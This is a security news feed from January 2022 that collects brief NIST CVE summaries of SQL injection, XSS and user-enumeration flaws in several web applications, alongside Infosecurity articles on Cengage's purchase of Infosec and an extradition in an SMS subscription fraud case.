January 2022

CVE-2022-24264

Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
Source: NIST
CVE-2022-24264

CVE-2022-24263

Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter.
Source: NIST
CVE-2022-24263

CVE-2022-23872

Emlog pro v1.1.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /admin/configure.php via the parameter footer_info.
Source: NIST
CVE-2022-23872

CVE-2022-24265

Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
Source: NIST
CVE-2022-24265

CVE-2022-21659

Flask-AppBuilder is an application development framework, built on top of the Flask web framework. In affected versions there exists a user enumeration vulnerability. This vulnerability allows for a non authenticated user to enumerate existing accounts by timing the response time from the server when you are logging in. Users are advised to upgrade to version 3.4.4 as soon as possible. There are no known workarounds for this issue.
Source: NIST
CVE-2022-21659

Cengage to Buy Cybersecurity Training platform, Infosec

Cengage to Buy Cybersecurity Training platform, Infosec

A global education technology company based in Boston has signed a $191M deal to buy the cybersecurity training platform, Infosec.


Cengage Group announced the planned addition to its ed2Go business on Monday. The deal is expected to close in the first quarter of 2022. 


“The online, employer-paid cybersecurity training segment is currently a $1bn market, with expectations that it will grow to $10bn annually by 2027,” said Cengage CEO Michael Hansen. 


He added: “Combining Infosec with our already-successful Workforce Skills business will provide top-line growth, expand our base of recurring revenue and accelerate our opportunity within the space.”


Infosec was founded in 2004 by its current chief executive Jack Koziol who will remain at the helm to manage the transition. The company is based in Wisconsin and provides skills development and certification programs for the cybersecurity industry. 


“Cengage Group has the same level of passion for making learning accessible, affordable and applicable to today’s cybersecurity professionals,” said Jack Koziol, CEO and Founder of Infosec. 


He added: “Building on ed2go’s history in online training, Infosec will benefit from Cengage Group’s scale and expertise, which means we can reach more cybersecurity professionals and employers that are looking to not only grow their careers but to keep businesses, governments and people safe from cyber threats.”


Infosec employs around 100 people and offers more than 1,400 online cybersecurity courses. Nearly all Infosec’s current employees will reportedly be joining Cengage’s workforce of 4,500 people. 


According to Cyber Seek, there are just under 600,000 vacant cybersecurity roles in the United States. Research by Burning Glass Technologies suggests that around half of these positions require at least one certification. 


“We can’t hire people fast enough,” Hansen told The Boston Globe. “Right now, the demand for workforce skills courses is just exploding, and it’s exploding in very specific job categories,” he said. 


Hansen continued: “There is such a labor shortage. Every CEO tells me that…the labor shortage is really a skills shortage.”


News of Cengage’s planned purchase comes as rival British publishing house Pearson announced its acquisition of Credly, a digital workforce credentialing service provider, for around $200m.



Source: Infosecurity
Cengage to Buy Cybersecurity Training platform, Infosec

CVE-2021-46459

Victor CMS v1.0 was discovered to contain multiple SQL injection vulnerabilities in the component admin/users.php?source=add_user. These vulnerabilities can be exploited through a crafted POST request via the user_name, user_firstname,user_lastname, or user_email parameters.
Source: NIST
CVE-2021-46459

Aussie Tech Entrepreneur Extradited Over SMS Fraud

Aussie Tech Entrepreneur Extradited Over SMS Fraud

A Russian-born tech entrepreneur has been extradited to the United States from Australia to face charges relating to a multi-million-dollar text messaging consumer fraud scheme.


The arrival in America of 41-year-old dual Russian and Australian citizen Eugeni Tsvetnenko was announced by the Federal Bureau of Investigation (FBI) on Friday. Tsvetnenko – also known as “Zhenya” – was extradited on charges of conspiracy to commit wire fraud, wire fraud, aggravated identity theft and conspiracy to commit money laundering.


Prosecutors allege that former Perth resident Tsvetnenko conspired with others to operate an auto-subscribing scheme that signed cell phone users to receive premium paid for content via text message without their knowledge or consent. 


“Eugeni Tsvetnenko is alleged to have surreptitiously subscribed hundreds of thousands of cell phone users to a $9.99 per-month charge for recurring text messages they did not approve or want,” said US attorney Damian Williams.  


Victims of the scheme received text messages on horoscopes, celebrity gossip and trivia facts. The scheme’s operators defrauded victims of approximately $41,389,725 and made around $20m in profits. 


Tsvetnenko’s alleged co-conspirators include Darcy Wedd, the operator of telecommunications company Mobile Messenger, and Fraser Thompson, Mobile Messenger’s senior vice president of strategic operations. 


“Tsvetnenko and his co-conspirators concocted a scheme that turned thousands of mobile phone customers into unwitting subscription service participants, as alleged,’ said FBI assistant director-in-charge Michael J. Driscoll said.


He added: “These customers incurred monthly charges for services they never subscribed to and, in many cases, disregarded as spam until the charges turned up on their monthly statements.”


Prosecutors allege that at the start of 2012, Wedd, Thompson and two other Mobile Messenger senior executives recruited Tsvetnenko to their auto-subscribing scheme to boost their company’s revenue. Tsvetnenko allegedly agreed and established two new content providers based in Australia, CF Enterprises and DigiMobi, to auto-subscribe on Mobile.


CC-3 allegedly provided Tsvetnenko with lists of phone numbers to target, along with instructions on how to auto-subscribe without being caught by making it appear as if the customers had genuinely chosen to buy the text-messaging services.


Tsvetnenko is further accused of working with co-conspirators to launder the proceeds of the auto-subscribing scheme.



Source: Infosecurity
Aussie Tech Entrepreneur Extradited Over SMS Fraud